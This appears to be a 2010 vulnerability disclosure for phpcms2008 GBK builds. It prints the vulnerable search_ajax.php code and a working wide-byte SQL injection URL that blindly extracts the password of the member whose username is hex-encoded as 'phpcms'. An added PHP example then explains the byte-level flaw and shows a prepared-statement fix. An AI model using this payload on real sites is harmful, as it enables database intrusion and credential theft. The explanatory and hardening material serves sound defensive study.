
phpcms2008-0day ask/search_ajax.php

2010-1-31 07:52 | Publisher: admin | Views: 30 | Comments: 0 | Original author: 慕容紫英

Affected software: phpcms2008 gbk

Vulnerable file: ask/search_ajax.php

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
// $q is not set in this file; it comes from the request parameter q.
// On a non-UTF-8 (GBK) install it is transcoded here, before the query is built.
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
    // Injection point: $q is interpolated straight into the LIKE clause.
    $where = " title LIKE '%$q%' AND status = 5";
}
else
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
    // Mark the search term inside each matching title.
    $val['title'] = str_replace($q, ''.$q.'', $val['title']);
    $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
    $info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

Test method:

ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
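
The listing converts `$q` from GBK to UTF-8 and only then builds the `LIKE` clause; when a lone GBK lead byte sits in front of an escaping backslash, the two bytes decode as one character and the quote that follows is left bare. The PHP below is an added example, not phpcms code: it reproduces that byte-level effect on a constructed string and shows a convert-then-bind alternative. It assumes the request value had been escaped with `addslashes`-style escaping before reaching the script, and the SQLite table `ask_demo` and the helper `search_titles` are made up for the illustration.

```php
<?php
// Added illustration, not phpcms code. Table, rows and input bytes are constructed.

// Constructed input: 's', a lone GBK lead byte (0xE6), then a single quote.
$raw = "s\xE6'";

// 1) Escape-then-convert, the order search_ajax.php ends up with
//    (assumption: the value was escaped addslashes-style before this script ran).
$escaped   = addslashes($raw);                  // bytes 73 E6 5C 27
$converted = iconv('GBK', 'UTF-8', $escaped);   // E6 5C is decoded as ONE character
printf("backslash survives conversion: %s\n",
    var_export(strpos($converted, '\\') !== false, true));
printf("string ends with a bare quote: %s\n",
    var_export(substr($converted, -1) === "'", true));

// 2) Hardened order: validate and convert the raw bytes first, then bind the value.
function search_titles(PDO $db, string $rawGbk): array
{
    // iconv() returns false when the input is not valid GBK; reject it outright.
    $q = @iconv('GBK', 'UTF-8', $rawGbk);
    if ($q === false || $q === '') {
        return [];
    }
    // Escape LIKE wildcards, then pass the value as a bound parameter so it
    // can never terminate the SQL string literal.
    $pattern = '%' . addcslashes($q, '%_\\') . '%';
    $stmt = $db->prepare(
        "SELECT title FROM ask_demo
          WHERE title LIKE ? ESCAPE '\\' AND status = 5
          ORDER BY askid DESC LIMIT 10"
    );
    $stmt->execute([$pattern]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ask_demo (askid INTEGER PRIMARY KEY, title TEXT, status INTEGER)");
$db->exec("INSERT INTO ask_demo (title, status) VALUES ('search tips', 5), ('hidden draft', 1)");

var_dump(search_titles($db, $raw));       // malformed GBK input is rejected
var_dump(search_titles($db, "search"));   // ordinary query
var_dump(search_titles($db, "o'brien"));  // a quote is treated as data
```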


